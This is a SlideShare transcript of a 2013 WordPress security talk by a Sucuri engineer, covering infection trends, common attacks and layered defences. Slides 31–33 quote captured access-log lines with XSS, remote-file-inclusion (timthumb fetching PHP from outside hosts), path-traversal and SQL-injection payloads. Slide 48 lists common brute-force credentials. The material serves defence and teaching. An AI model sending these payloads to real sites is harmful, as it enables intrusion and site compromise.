Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

of

Word press website security Slide 1 Word press website security Slide 2 Word press website security Slide 3 Word press website security Slide 4 Word press website security Slide 5 Word press website security Slide 6 Word press website security Slide 7 Word press website security Slide 8 Word press website security Slide 9 Word press website security Slide 10 Word press website security Slide 11 Word press website security Slide 12 Word press website security Slide 13 Word press website security Slide 14 Word press website security Slide 15 Word press website security Slide 16 Word press website security Slide 17 Word press website security Slide 18 Word press website security Slide 19 Word press website security Slide 20 Word press website security Slide 21 Word press website security Slide 22 Word press website security Slide 23 Word press website security Slide 24 Word press website security Slide 25 Word press website security Slide 26 Word press website security Slide 27 Word press website security Slide 28 Word press website security Slide 29 Word press website security Slide 30 Word press website security Slide 31 Word press website security Slide 32 Word press website security Slide 33 Word press website security Slide 34 Word press website security Slide 35 Word press website security Slide 36 Word press website security Slide 37 Word press website security Slide 38 Word press website security Slide 39 Word press website security Slide 40 Word press website security Slide 41 Word press website security Slide 42 Word press website security Slide 43 Word press website security Slide 44 Word press website security Slide 45 Word press website security Slide 46 Word press website security Slide 47 Word press website security Slide 48 Word press website security Slide 49 Word press website security Slide 50 Word press website security Slide 51
Upcoming SlideShare
Firefox OS - Api battery status
Next
Download to read offline and view in fullscreen.

4 Likes

Share

Download to read offline

Word press website security

Download to read offline

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all

Word press website security

  1. 1. WordPressWebsite Security
  2. 2.  Specialization:  Website Security  Incident Handling  LogAnalysis  Special Interests:  Warfare  Weapons  Martial Arts Tony Perez | @perezbox | @sucuri_security5/1/2013 2
  3. 3.  Website Security Company  GlobalOperations  AllWebsite Platforms  Scan 1M Unique Domains a Month  Block 1M web attacks a Month  300 – 500 websites a day  Signature / Heuristic Based  24/5 - 18/2 operations 5/1/2013 Tony Perez | @perezbox | @sucuri_security 3
  4. 4.  Trends  Threats  Defenses 5/1/2013 Tony Perez | @perezbox | @sucuri_security 4 SIMPLE RIGHT?
  5. 5. Tony Perez | @perezbox | @sucuri_security5/1/2013 5
  6. 6. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 6 Malicious Links 2011 2012
  7. 7. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 7
  8. 8. Known Malware Unkown Malware 5/1/2013 Tony Perez | @perezbox | @sucuri_security 8
  9. 9. Not Infected Infected 5/1/2013 Tony Perez | @perezbox | @sucuri_security 9
  10. 10. 26% 19% 16% 14% 11% 4% 10% Remote iFrame Includes Remote JavaScript Includes SPAM Injections Obfuscated / Encoded JavaScript Conditional Redirects Defacements Other 5/1/2013 Tony Perez | @perezbox | @sucuri_security 10
  11. 11. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 11 Apache SSH Email Server  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a changes a lot
  12. 12.  StickWith Reputable Sources  Gravity Forms  JetPack Forms  Generating SPAM emails, resource hogs  IP blacklisting  LeverageCaptchas 5/1/2013 Tony Perez | @perezbox | @sucuri_security 12
  13. 13. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 13
  14. 14.  Pharmacy  Payday Loans 5/1/2013 Tony Perez | @perezbox | @sucuri_security 14
  15. 15. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 15  Access – so easy, yet so weak
  16. 16. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 16
  17. 17. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 17
  18. 18. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 18 Site 1 Site 2Site 3 Site 4WordPress 2.8 WordPress 3.5.1 WordPress 3.4.2 WordPress 3.0
  19. 19. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 19
  20. 20. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 20
  21. 21. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 21
  22. 22. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 22
  23. 23. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 23
  24. 24. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 24
  25. 25.  W3TC &WP Super Cache  Remote Command Execution (RCE)Vulnerability  WPMM  SPAM Injections (Bad Plugin)  Social MediaWidget  SPAM Injections (Core Commit) 5/1/2013 Tony Perez | @perezbox | @sucuri_security 25
  26. 26.  Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole Exploit Kit – Today’s market leader  2013 – SophoLabs 5/1/2013 Tony Perez | @perezbox | @sucuri_security 26
  27. 27. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 27
  28. 28. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 28
  29. 29. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 29
  30. 30. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 30  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?
  31. 31. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 31 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective
  32. 32. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 5/1/2013 Tony Perez | @perezbox | @sucuri_security 32
  33. 33. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 33 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
  34. 34. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 34
  35. 35. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 35
  36. 36.  Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 5/1/2013 Tony Perez | @perezbox | @sucuri_security 36
  37. 37. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 37
  38. 38.  Access Control  Vulnerabilities  Hosting  Online Habits  Social Media  Passwords 5/1/2013 Tony Perez | @perezbox | @sucuri_security 38
  39. 39. “It’s about risk reduction… risk will never be zero…” 5/1/2013 Tony Perez | @perezbox | @sucuri_security 39
  40. 40.  We run on WordPress  CurrentVersion of course  Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 5/1/2013 Tony Perez | @perezbox | @sucuri_security 40
  41. 41.  Instead of telling you what you need to do, I’ll just tell you what we do;  Our philosophy and approach is very simple, complex things break in complex ways;  We focus on the areas that we can immediately control;  We believe in layered defenses; 5/1/2013 Tony Perez | @perezbox | @sucuri_security 41
  42. 42. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 42 Stay Current IPWhitelisting Two Factor Authentication Strong / Unique Password Web Application Firewall
  43. 43. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 43 IPWhitelisting Server Isolation Public Key Authentication Host Intrusion Detection System (HIDS) Log Everything
  44. 44. Category Tool Type Prevention – SoftwareVulnerabilities Sucuri CloudProxy Service Prevention – Access Control Sucuri CloudProxy Service Detection Sucuri Monitoring Service Remediation Sucuri Service Password Management 1Password / LastPass Application Host-based Intrusion Detection System OSSEC Application Access Control Enforcement Login Secure Solutions Plugin Two-Factor Authentication Google Authenticator Plugin Application Auditing Sucuri Premium Plugin Backups BackupBuddy Plugin 5/1/2013 Tony Perez | @perezbox | @sucuri_security 44
  45. 45. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 45 Category Location Type DisableTheme / Plugin Editor wp-config.php Preventive measure Disable PHP execution .htacces – uploads / images / wp-includes / etc.. Preventive measure Permissions Directories 755 / Files 644 Preventive measure
  46. 46. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 46 • Don’t know what you’re doing? • Go with a managed host…
  47. 47. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 47 Doesn’t mean you won’t ever get infected.
  48. 48. Complex . Long . Unique . Esoteric “CLUE” 5/1/2013 Tony Perez | @perezbox | @sucuri_security 48 652,911 [log] => admin 10173 [log] => test 8992 [log] => administrator 8921 [log] => Admin 2495 [log] => root 16,798 [pwd] => admin 10,880 [pwd] => 123456 9,727 [pwd] => 666666 9,106 [pwd] => 111111 7,882 [pwd] => 12345678 7,717 [pwd] => qwerty 7,295 [pwd] => 1234567 USERNAMES PASSWORDS Epic Fail
  49. 49.  Access  Login Secure Solution  Stealth Login  Limit Login  Scanning  WordFence  Anti-Malwatch  Defense in Depth  BetterWP Security  BulletProof Security  Vulnerabilities  MVIS Security Center 5/1/2013 Tony Perez | @perezbox | @sucuri_security 49
  50. 50. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 50 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv WordPress Forum – Hacked http://wordpress.org/tags/hacked WordPress Forum – Malware http://wordpress.org/tags/malware Badware Busters https://badwarebusters.org Perishable Press http://perishablepress.com/category/web-design/security/ Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites WordPress.org Hardening http://codex.wordpress.org/Hardening_WordPress GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
  51. 51. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 51
  • maximejobin

    Jul. 21, 2016
  • kingodd

    Jun. 20, 2013
  • od3n

    Jun. 8, 2013
  • TakeshiWatanabe2

    May. 5, 2013

Views

Total views

3,699

On Slideshare

0

From embeds

0

Number of embeds

5

Actions

Downloads

8

Shares

0

Comments

0

Likes

4

×